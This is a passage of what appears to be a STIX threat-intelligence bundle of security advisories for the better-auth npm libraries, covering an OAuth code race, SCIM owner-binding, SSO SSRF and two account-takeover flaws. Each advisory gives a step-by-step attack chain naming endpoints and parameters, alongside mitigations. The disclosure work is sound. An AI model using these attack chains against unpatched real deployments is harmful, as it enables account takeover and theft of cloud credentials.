      "description": "## Overview\n\nA significant race condition vulnerability, tracked as CVE-2026-53518, has been identified in the `@better-auth/oauth-provider` library versions `\u003e= 1.6.0, \u003c 1.6.11` and the `better-auth` library versions `\u003c 1.6.11` when using legacy `oidc-provider` or `mcp` plugins. This flaw affects applications exposing token endpoints like `/api/auth/oauth2/token`, `/oauth2/token`, or `/mcp/token` for OAuth/OIDC clients. The vulnerability stems from a non-atomic \"find-then-delete\" operation for authorization codes, allowing two nearly simultaneous token redemption requests with the same code to both succeed. This bypasses the RFC 6749 §4.1.2 requirement that authorization codes be single-use, enabling attackers to obtain multiple, independent sets of valid access, refresh, and ID tokens from a single authorization. This can lead to unauthorized persistence and makes detection more difficult as standard single-use enforcement mechanisms are circumvented.\n\n## Attack Chain\n\n1.  An attacker first obtains a valid OAuth authorization code for a target user (e.g., through phishing, client-side credential theft, or other initial access methods not detailed in this vulnerability).\n2.  The attacker then crafts and sends two nearly simultaneous `POST` requests to the application's token endpoint (e.g., `/api/auth/oauth2/token`) using the *exact same* authorization `code` value.\n3.  Both concurrent requests arrive at the vulnerable server and initiate the token redemption process, specifically reaching the \"find\" (read) operation for the authorization code in the database.\n4.  Due to the non-atomic nature of the primitive, both requests successfully read the authorization code's details from the database before either request has completed the subsequent \"delete\" operation.\n5.  Each request independently proceeds to validate the Proof Key for Code Exchange (PKCE) (if used) and other authorization details, subsequently triggering the `createUserTokens` function.\n6.  As a result, each of the two racing requests successfully mints a complete and independent set of new access, refresh, and ID tokens, all valid for the original user's authorization scope.\n7.  One of the requests eventually completes the \"delete\" operation, invalidating the authorization code for any *further* redemptions, but only after both token sets have already been issued.\n8.  The attacker now possesses multiple, independent, and valid authentication token sets, which can be leveraged for sustained access, session persistence, or to evade single-use detection mechanisms.\n\n## Impact\n\nThe primary impact of CVE-2026-53518 is the ability for an attacker to obtain multiple, independent access, refresh, and ID token sets from a single OAuth authorization code. These forged token sets are fully valid for the original user's authorized scope, effectively granting redundant, prolonged access to the victim's resources. This directly violates the single-use requirement for authorization codes as specified in RFC 6749 §4.1.2, leading to an authentication bypass and making detection of unauthorized token issuance significantly harder. All deployments using the affected `@better-auth/oauth-provider` versions or the legacy `oidc-provider` and `mcp` plugins from `better-auth` are susceptible, including internal MCP clients and AI agents, potentially compromising user accounts and data across these platforms.\n\n## Recommendation\n\n*   **Upgrade immediately:** Upgrade `@better-auth/oauth-provider` to `1.6.11` or later to remediate CVE-2026-53518. If using legacy plugins, upgrade `better-auth` to `1.6.11` or later.\n*   **Implement network-layer controls:** For environments unable to immediately upgrade affected products, deploy an authorization-server-aware reverse proxy (e.g., NGINX with Lua, Envoy) configured to implement an in-flight idempotency cache keyed by the `code` parameter.\n*   **Consider database-layer mitigation:** If feasible, add a database-level uniqueness constraint to prevent two `oauthAccessToken` rows from being created with the same upstream authorization code reference, though this might require schema changes not directly supported by the affected products.\n*   **Review `POST /oauth2/token` logging:** Ensure comprehensive logging for the `/api/auth/oauth2/token`, `/oauth2/token`, and `/mcp/token` endpoints, capturing source IP, user agent, and request parameters where possible, to facilitate correlation of suspicious concurrent requests for the same authorization code.\n",
      "published": "2026-07-07T21:06:15Z",
      "labels": [
        "oauth",
        "authorization-bypass",
        "race-condition",
        "web-application",
        "ghsa",
        "npm"
      ],
      "object_refs": [
        "attack-pattern--d3a58f2c-9521-50dc-be06-a5f640e2a92c",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-7w99-5wm4-3g79"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/362.html"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/367.html"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/294.html"
        },
        {
          "source_name": "reference",
          "url": "https://datatracker.ietf.org/doc/html/rfc6749#section-4.1.2"
        },
        {
          "source_name": "reference",
          "url": "https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1#section-4.1"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5675de06-d1fd-5c7d-95b9-b8ee58c2d06f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7c43f6cb-80a5-5bc0-ba09-679e19eca9dd",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Use Alternate Authentication Material",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1550",
          "url": "https://attack.mitre.org/techniques/T1550"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9ef5c449-a8ba-596a-ab91-262103f25582",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7c43f6cb-80a5-5bc0-ba09-679e19eca9dd",
      "target_ref": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7c43f6cb-80a5-5bc0-ba09-679e19eca9dd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Takeover via Missing Owner Binding in @better-auth/scim",
      "description": "## Overview\n\nA critical authorization bypass vulnerability, impacting `@better-auth/scim` plugin versions 1.5.0 through 1.7.0-beta.3, allows any authenticated user to gain control over non-organization (personal) SCIM providers created by other users. This flaw stems from a missing owner binding mechanism in the default configuration, where the plugin fails to associate providers with their creators and adequately enforce access checks. This means that if an application has more than one authenticated user and utilizes non-organization SCIM providers, one user can target and compromise another's provider. The exploitation involves direct API calls to management endpoints, enabling attackers to read metadata, regenerate SCIM bearer tokens, and subsequently manage SCIM-provisioned users, effectively achieving account takeover for the targeted provider. The `1.6.x` stable line remains unpatched, posing an ongoing risk to deployments not upgrading to `1.7.0-beta.4` or later.\n\n## Attack Chain\n\n1.  An authenticated user (Alice) signs in and creates a non-organization SCIM provider by making a `POST` request to `/scim/generate-token` with `{ \"providerId\": \"corp-idp\" }`.\n2.  Another authenticated user (Bob) signs in to the same application instance.\n3.  Bob discovers Alice's provider by making a `GET` request to `/scim/get-provider-connection?providerId=corp-idp`, which returns `200 OK` due to the missing owner binding.\n4.  Bob initiates a token regeneration for Alice's provider by sending a `POST` request to `/scim/generate-token` with `{ \"providerId\": \"corp-idp\" }`.\n5.  The `@better-auth/scim` plugin, due to the authorization bypass, processes Bob's request as if he were the legitimate owner, deleting the existing token and generating a new one.\n6.  Bob receives a new SCIM bearer token in the `201 Created` response.\n7.  Alice's original SCIM bearer token for `corp-idp` becomes invalid, leading to `401 Unauthorized` responses if she attempts to use it.\n8.  Bob can now use the newly acquired SCIM bearer token to authenticate against the provider's SCIM API routes (e.g., `GET /scim/v2/Users`), effectively taking over management of SCIM-provisioned users for Alice's provider.\n\n## Impact\n\nThis vulnerability allows any authenticated user to completely compromise non-organization SCIM providers created by other users within the application. An attacker can discover details about these connections, read sensitive provider metadata, regenerate SCIM bearer tokens (rendering legitimate tokens unusable), and then use the new token to gain full control over the SCIM API routes associated with that provider. This enables the attacker to manage (create, modify, delete) SCIM-provisioned users, which can lead to unauthorized access, data manipulation, or denial of service within integrated systems. While no specific victim counts or sectors were identified in the source, any organization deploying `@better-auth/scim` with non-organization providers in versions 1.5.0 through 1.7.0-beta.3 is vulnerable to this account takeover risk.\n\n## Recommendation\n\n*   Upgrade `@better-auth/scim` to version `1.7.0-beta.4` (or the subsequent stable `1.7.0`) immediately. This upgrade, mentioned in the fix section, removes the `providerOwnership` option and makes owner binding mandatory.\n*   Execute the schema migration (`npx auth migrate`) as instructed after upgrading to update the `scimProvider.userId` column.\n*   As an interim workaround, configure the plugin with `providerOwnership: { enabled: true }` when registering it and run the schema update (`npx auth generate` or `npx auth migrate`).\n*   Alternatively, ensure all SCIM providers are scoped to an `organizationId` to leverage existing organizational membership and role checks, which are not affected by this vulnerability.\n*   Implement edge-level restrictions on access to the SCIM management endpoints if non-organization providers must remain ownerless until a full patch is deployed.\n",
      "published": "2026-07-07T21:05:01Z",
      "labels": [
        "authorization-bypass",
        "account-takeover",
        "npm",
        "library",
        "web-application",
        "scim"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-j8v8-g9cx-5qf4"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/862.html"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/639.html"
        },
        {
          "source_name": "reference",
          "url": "https://datatracker.ietf.org/doc/html/rfc7644"
        },
        {
          "source_name": "reference",
          "url": "https://datatracker.ietf.org/doc/html/rfc6750"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--747fefac-4674-5e42-840f-f883a3b0ba6d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--493f9aec-d135-59c5-bf92-6bd92ce1b4ad",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--f198ff96-24d2-5e63-a16c-7bd8ef92750c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Network Configuration Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1016",
          "url": "https://attack.mitre.org/techniques/T1016"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bd875678-8925-50a1-ac48-75ea1d4181bc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--493f9aec-d135-59c5-bf92-6bd92ce1b4ad",
      "target_ref": "attack-pattern--f198ff96-24d2-5e63-a16c-7bd8ef92750c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1592",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1592",
          "url": "https://attack.mitre.org/techniques/T1592"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--53a0b176-f9bf-5c93-b54d-54f47356d0bf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--493f9aec-d135-59c5-bf92-6bd92ce1b4ad",
      "target_ref": "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1098",
          "url": "https://attack.mitre.org/techniques/T1098"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ea329125-bc94-5fd2-81ae-50d9e2e63807",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--493f9aec-d135-59c5-bf92-6bd92ce1b4ad",
      "target_ref": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--493f9aec-d135-59c5-bf92-6bd92ce1b4ad",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "@better-auth/sso provider registration Server-Side Request Forgery via unvalidated OIDC endpoints",
      "description": "## Overview\n\nA critical server-side request forgery (SSRF) vulnerability, identified as CVE-2026-53513, has been discovered in the `@better-auth/sso` npm package, affecting versions `\u003e= 0.1.0, \u003c 1.6.11` and `1.7.0-beta.x`. This flaw stems from improper input validation on the `POST /sso/register` and `POST /sso/update-provider` endpoints when `skipDiscovery: true` is set. An authenticated attacker can supply arbitrary URLs for OIDC `userInfoEndpoint`, `tokenEndpoint`, and `jwksEndpoint` parameters, which are then used by the server to make unvalidated HTTP requests. This allows an attacker to force the server to connect to internal network resources, cloud metadata services, or other arbitrary URLs, exfiltrating sensitive data. Furthermore, if `trustEmailVerified: true` is configured, the SSRF can escalate to account takeover by manipulating `emailVerified` claims.\n\n## Attack Chain\n\n1.  **Initial Access / Authentication**: An attacker obtains a valid session with the affected application, typically through standard user registration or login.\n2.  **Vulnerable Endpoint Interaction**: The attacker sends a `POST` request to the `/sso/register` (or `/sso/update-provider`) endpoint, including `skipDiscovery: true` in the request parameters.\n3.  **Malicious OIDC Configuration Submission**: Within the `oidcConfig` parameters of the `POST` request, the attacker specifies controlled URLs for `userInfoEndpoint`, `tokenEndpoint`, or `jwksEndpoint` that point to internal network resources (e.g., `169.254.169.254` for AWS IMDS, RFC 1918 addresses) or attacker-controlled external infrastructure.\n4.  **Server-Side Request Initiation**: During the OIDC callback process, the `@better-auth/sso` plugin's server-side code fetches content from these attacker-supplied, unvalidated URLs.\n5.  **Information Disclosure / Internal Network Access**: The server makes an outbound connection to the attacker-defined URL, retrieving its content. This can include cloud metadata credentials, internal API responses, or other sensitive information.\n6.  **Data Exfiltration / Account Takeover**: The fetched response body is reflected in the user profile, allowing non-blind SSRF. If `trustEmailVerified: true` is enabled, the attacker can manipulate the OIDC response to assert an arbitrary `emailVerified: true` claim, leading to OAuth auto-link and account takeover of existing users.\n\n## Impact\n\nThis vulnerability poses a critical risk, primarily leading to Server-Side Request Forgery (SSRF) and potential account takeover. With SSRF, attackers can access sensitive internal resources, including cloud metadata services like AWS IMDS, internal APIs, and infrastructure services running on private IP ranges, potentially exposing IAM credentials or other confidential data. If the `trustEmailVerified` flag is enabled, the SSRF can escalate to full account takeover for any pre-existing user whose email address overlaps with an attacker-chosen domain, allowing unauthorized access and manipulation of user accounts within the application. The severity is high for any organization using the affected versions of the package with the SSO plugin enabled.\n\n## Recommendation\n\n*   **Upgrade Immediately**: Patch CVE-2026-53513 by upgrading `@better-auth/sso` to version `1.6.11` or later to fix the input validation issue.\n*   **Implement Egress Controls**: Deploy the Sigma rule below to detect suspicious outbound connections to private IP ranges and cloud metadata services from your application servers and review firewall/VPC egress rules to block these connections as described in the brief's \"Network-level egress controls\" workaround.\n*   **Disable Self-Registration**: If immediate upgrade is not possible, apply the workaround by setting `sso({ providersLimit: 0 })` to disable provider self-registration, blocking access to the vulnerable `/sso/register` endpoint.\n*   **Review `trustEmailVerified` Configuration**: If `trustEmailVerified` is set to `true`, consider setting it to `false` until an upgrade is possible, as this mitigates the account takeover risk, as highlighted in the \"Set `trustEmailVerified: false`\" workaround.\n*   **Reverse-Proxy Gate**: Implement a reverse-proxy rule to block `POST /sso/register` and `POST /sso/update-provider` at the network edge as per the \"Reverse-proxy gate\" workaround.\n",
      "published": "2026-07-07T21:03:44Z",
      "labels": [
        "vulnerability",
        "ssrf",
        "account-takeover",
        "npm",
        "nodejs",
        "webserver"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--f198ff96-24d2-5e63-a16c-7bd8ef92750c",
        "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3",
        "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-5rr4-8452-hf4v"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/918.html"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/20.html"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/441.html"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/345.html"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7f0d0e88-58a1-5a2c-b994-2d5144065498",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ea6bfd38-d73e-5684-91dd-c4e272d17bbd",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--27485e01-b096-5ff6-bfb3-eb77fe634b79",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ea6bfd38-d73e-5684-91dd-c4e272d17bbd",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a0730b09-0b18-5c3b-b7ea-4b2c88178c49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ea6bfd38-d73e-5684-91dd-c4e272d17bbd",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ea6bfd38-d73e-5684-91dd-c4e272d17bbd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Better Auth vulnerable to unauthorized invitation acceptance via unverified email match in organization plugin (CVE-2026-53514)",
      "description": "## Overview\n\nA high-severity vulnerability (CVE-2026-53514) has been identified in the `better-auth` npm library, specifically within its `organization` plugin. This flaw allows an unauthenticated attacker to bypass email ownership verification during the invitation acceptance process, leading to unauthorized account takeover within targeted organizations. The vulnerability primarily affects applications that use `better-auth` with default settings, where email verification (`emailAndPassword.requireEmailVerification`) is disabled and invitation-specific verification (`requireEmailVerificationOnInvitation`) is not explicitly enabled. By pre-registering an unverified account with a victim's email address and then obtaining a leaked invitation ID, an attacker can accept the invitation, gaining access to the organization at the invited role. This poses a significant risk of unauthorized data access and manipulation.\n\n## Attack Chain\n\n1.  Attacker identifies a target application utilizing `better-auth` with specific vulnerable configurations: `emailAndPassword.enabled: true`, `emailAndPassword.requireEmailVerification: false` (default), and `organization()` not explicitly setting `requireEmailVerificationOnInvitation: true` (default).\n2.  Attacker registers an unverified user account using the target victim's email address (e.g., `victim@target.example`) via the application's sign-up interface, establishing an active session with `emailVerified: false`.\n3.  A legitimate organization administrator invites the `victim@target.example` to their organization, specifying a role and generating a unique `invitationId`.\n4.  The attacker obtains the `invitationId` through various leakage vectors, such as an exposed admin UI, chat paste, forwarded email, or mail-forwarding rules at the recipient's domain.\n5.  Using their active, unverified session and the obtained `invitationId`, the attacker makes an API call to the `acceptInvitation` endpoint.\n6.  The `acceptInvitation` endpoint, due to the vulnerability (CVE-2026-53514), performs only a case-insensitive string comparison between `invitation.email` and `session.user.email`, critically failing to enforce the `session.user.emailVerified` status.\n7.  The application incorrectly validates the attacker's unverified session as the legitimate invitee, allowing them to accept the invitation and join the organization under the invited role.\n8.  The attacker gains unauthorized access to organization-scoped data and functionalities, achieving account takeover of the invited role.\n\n## Impact\n\nThe successful exploitation of CVE-2026-53514 leads to significant security implications, primarily account takeover via pre-account hijacking on the organization's invitation surface. Attackers, armed with only an unverified self-issued session and a leaked `invitationId`, can join an organization at the invited role. This grants them unauthorized access to read invitation contents and any organization-scoped data visible to that role, effectively allowing them to act as a member of the victim organization. This can lead to sensitive information disclosure, data manipulation, or further lateral movement within the compromised organization.\n\n## Recommendation\n\n*   **Upgrade immediately:** Upgrade `better-auth` to version `1.6.11` or later to apply the official patch for CVE-2026-53514.\n*   **Configure `organization()` options:** If immediate upgrade is not possible, explicitly set `organization({ requireEmailVerificationOnInvitation: true })` in your application to mitigate the `acceptInvitation` and `rejectInvitation` endpoints.\n*   **Enforce `emailAndPassword` verification:** Ensure that your application's `emailAndPassword` configuration sets `emailAndPassword.requireEmailVerification: true` to prevent creation of unverified user accounts that can be leveraged for this attack.\n*   **Implement custom middleware:** Deploy application-level middleware on organization invitation routes to assert `session.user.emailVerified === true` before processing any invitation-related actions.\n",
      "published": "2026-07-07T21:00:36Z",
      "labels": [
        "vulnerability",
        "web-application",
        "authentication-bypass",
        "authorization-bypass",
        "account-takeover",
        "npm"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-fmh4-wcc4-5jm3"
        },
        {
          "source_name": "reference",
          "url": "CVE-2026-53514"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a82f5cf8-fb35-5523-ad97-a9088bcda882",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6950f485-cebd-5b11-ad71-494e81173976",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--6950f485-cebd-5b11-ad71-494e81173976",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Better Auth Account Takeover via OAuth Auto-Link Vulnerability",
      "description": "## Overview\n\nA critical account takeover vulnerability (CVE-2026-53516) has been identified in `better-auth` library versions prior to 1.6.11, affecting applications where `emailAndPassword.enabled: true` and implicit account linking is active. This flaw, reminiscent of previous \"nOAuth\" and \"Sign in with Apple\" issues, allows an attacker to gain full control of a victim's account. The vulnerability leverages the OAuth auto-linking mechanism, which incorrectly validates only the OAuth provider's `email_verified` claim without checking the local user row's `emailVerified` status. This enables an attacker to pre-register a victim's email, then, when the victim attempts to sign in via an OAuth/SSO provider, the system links the victim's identity to the attacker's unverified pre-registered account. This bypasses email verification requirements, granting the attacker persistent access and a functional password login for the victim's identity.\n\n## Attack Chain\n\n1.  An attacker pre-registers an account using a victim's email address via the `/sign-up/email` endpoint in an application utilizing `better-auth \u003c 1.6.11`. This creates a user row with `emailVerified: false`.\n2.  The legitimate victim attempts to sign in or link an account using an OAuth or SSO provider (e.g., Google, Facebook) with the same email address.\n3.  The `better-auth` application initiates the OAuth callback flow, processing the provider's `userInfo` which includes the `email_verified: true` claim.\n4.  The `handleOAuthUserInfo` function in `better-auth` attempts to auto-link the OAuth identity. Because no `(accountId, providerId)` match exists, it falls back to a user lookup by email, finding the attacker's pre-registered account.\n5.  The `handleOAuthUserInfo` auto-link gate only validates the OAuth provider's `email_verified: true` claim and implicitly links the victim's OAuth identity to the attacker's pre-registered account. It fails to check `dbUser.user.emailVerified`.\n6.  A separate post-link step promotes the local `emailVerified` flag on the attacker's account to `true` because the provider's claim was `true`.\n7.  The attacker now possesses a fully verified account associated with the victim's email and OAuth identity, including a functional password login, achieving full account takeover (CVE-2026-53516).\n\n## Impact\n\nThis vulnerability (CVE-2026-53516) directly leads to full account takeover for affected users, allowing attackers to gain persistent access to victim accounts. It effectively bypasses any configured `emailAndPassword.requireEmailVerification: true` settings, as the linking process promotes the attacker's pre-registered account to a verified state. The issue is widespread across `better-auth` implementations, affecting every OAuth and SSO sign-in path that utilizes the `handleOAuthUserInfo` function, including built-in social providers, generic OAuth, OAuth proxy, SSO OIDC, SSO SAML, and one-tap sign-in flows. While no specific victim numbers or targeted sectors are provided, any application using the vulnerable `better-auth` library as described is at risk.\n\n## Recommendation\n\n*   Upgrade `better-auth` to version `1.6.11` or later immediately to apply the patch for CVE-2026-53516.\n*   If immediate upgrade is not feasible for `better-auth \u003c 1.6.11`, implement the workaround by setting `account.accountLinking.disableImplicitLinking: true` in your `betterAuth({...})` configuration.\n*   Alternatively, set `account.accountLinking.enabled: false` in your `betterAuth({...})` configuration to completely disable account linking as a temporary measure.\n",
      "published": "2026-07-07T20:59:01Z",
      "labels": [
        "account-takeover",
        "vulnerability",
        "web-application",
        "oauth",
        "sso"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-g38m-r43w-p2q7"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/287.html"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/345.html"
        },
        {
          "source_name": "reference",
          "url": "https://www.usenix.org/conference/usenixsecurity22/presentation/sudhodanan"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7e08cc4d-bf8c-5411-8279-949748a9e079",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--358ee0b8-5ebd-5535-967c-db89c5d6a1ba",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dd3e3590-89db-5b7f-b969-e9dc442444ff",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--358ee0b8-5ebd-5535-967c-db89c5d6a1ba",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
